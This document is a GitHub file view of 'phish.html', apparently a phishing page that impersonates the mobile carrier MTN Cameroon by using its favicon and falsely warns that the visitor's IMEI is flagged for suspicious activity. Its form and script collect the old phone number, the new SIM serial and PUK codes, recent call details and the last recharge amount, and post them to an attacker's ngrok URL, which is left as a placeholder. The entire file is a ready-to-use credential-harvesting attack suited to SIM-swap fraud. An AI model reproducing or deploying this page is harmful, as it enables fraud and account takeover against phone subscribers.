-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathphish.html
71 lines (61 loc) · 1.87 KB
/
phish.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
<!DOCTYPE html>
<html>
<head>
<title>PHONE NUMBER ERROR FLAGED FOR SUSPICIOUS ACTIVITIES</title>
<link rel="shortcut icon" href="https://www.mtncameroon.cm/favicon.ico">
<style>
body {
background-color: yellow;
}
h1, h2, p {
color: black;
}
img {
width: 100px;
}
form {
margin-top: 20px;
}
input {
background-color: white;
border: 1px solid black;
}
</style>
</head>
<body>
<h1>Your cell phone's IMEI code has been flagged for suspicious activity.</h1>
<p>Please provide the following information to verify your identity and update your security settings:</p>
Your old phone number:
Serial number of the new SIM card:
PUK code of the new SIM card:
One of the last 5 numbers you called:
Amount of your last recharge:
<form action="https://<your ngrok url>/" method="post" enctype="multipart/form-data">
<input type="tel" name="old_phone_number" placeholder="Old Phone Number">
<input type="text" name="new_sim_serial_number" placeholder="New SIM Serial Number">
<input type="text" name="new_sim_puk_number" placeholder="New SIM PUK Number">
<input type="tel" name="last_five_called_numbers" placeholder="One of the last 5 numbers you called">
<input type="number" name="last_recharge_amount" placeholder="Amount of your last recharge">
<input type="submit" value="Submit">
</form>
<script>
const form = document.querySelector('form');
form.addEventListener('submit', (event) => {
event.preventDefault();
const data = new FormData(form);
data.append('old_phone_number', form['old_phone_number'].value);
const request = new XMLHttpRequest();
request.open('POST', https://<your ngrok url>/);
request.send(data);
request.onload = () => {
if (request.status === 200) {
const response = JSON.parse(request.responseText);
console.log(response);
} else {
console.log('Error: ' + request.statusText);
}
};
});
</script>
</body>
</html>